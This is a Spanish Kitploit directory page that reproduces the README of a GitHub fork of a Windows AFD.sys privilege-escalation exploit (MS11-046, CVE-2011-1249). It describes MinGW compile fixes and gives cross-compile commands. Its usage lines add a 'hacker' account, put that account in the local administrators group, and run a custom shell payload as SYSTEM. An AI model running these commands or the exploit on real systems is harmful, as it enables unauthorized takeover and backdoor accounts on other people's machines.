Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
edb-40564-mingw-fix — CVE-2011-1249 (MS11-046) escalada de privilegios de AFD — corrección de compilación cruzada MinGW + soporte de comandos personalizados | Kitploit
Herramientas/GitHubGitHub/appl3b0y/edb-40564-mingw-fix
Escalada de PrivilegiosGeneración de PayloadsAnálisis de VulnerabilidadesExplotaciónPruebas de PenetraciónExplotación de Binarios
GitHubappl3b0y/edb-40564-mingw-fix

edb-40564-mingw-fix

CVE-2011-1249 (MS11-046) escalada de privilegios de AFD — corrección de compilación cruzada MinGW + soporte de comandos personalizados

Ver Repositorio
hace 4 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

ms11-046-mingw

CVE-2011-1249 / MS11-046 — escalada de privilegios de AFD.sys para Windows x86.

Exploit original por Tomislav Paskalev (EDB-40564). Este fork corrige errores de compilación cruzada con MinGW y añade ejecución de comandos personalizados mediante argv[1].


Cambios respecto al original

#CambioMotivo
1FARPROC ZwQuerySystemInformation → puntero a función tipado (pZwQuerySystemInformation)La comprobación estricta de tipos de MinGW rechaza llamar a un FARPROC de cero parámetros con argumentos — la compilación falla con too many arguments to function
2Arrays securityPatches[] marcados como staticLos arrays declarados dentro de bloques if/else se asignan en la pila y salen del ámbito; sin static los punteros quedan colgando
3Comando personalizado mediante argv[1]Ejecuta cualquier comando como SYSTEM en lugar del cmd.exe fijo

Problema

Compilar el original con MinGW falla:

root@kitploit:~
ms11-046.c: error: too many arguments to function 'ZwQuerySystemInformation'; expected 0, have 4

FARPROC es un puntero a función genérico declarado con cero parámetros. MinGW aplica una comprobación de tipos estricta y rechaza llamarlo con argumentos. La solución es un puntero a función tipado con la firma correcta.

Existen binarios precompilados (p. ej. SecWiki/windows-kernel-exploits) pero no admiten comandos personalizados.


Compilación cruzada en Linux (MinGW)

root@kitploit:~
sudo apt install mingw-w64
i686-w64-mingw32-gcc ms11-046.c -o ms11-046.exe -lws2_32

Uso

root@kitploit:~
ms11-046.exe                                             # por defecto: abre cmd.exe como SYSTEM
ms11-046.exe "net user hacker Pass123! /add"             # añade un usuario como SYSTEM
ms11-046.exe "net localgroup administrators hacker /add" # añade al grupo de administradores locales
ms11-046.exe "c:\windows\temp\shell.exe"                 # ejecuta un payload personalizado como SYSTEM

Referencias

  • MS11-046 — Boletín de seguridad de Microsoft
  • CVE-2011-1249 - Base de Datos Nacional de Vulnerabilidades
  • EDB-40564 — exploit original
Descargar herramienta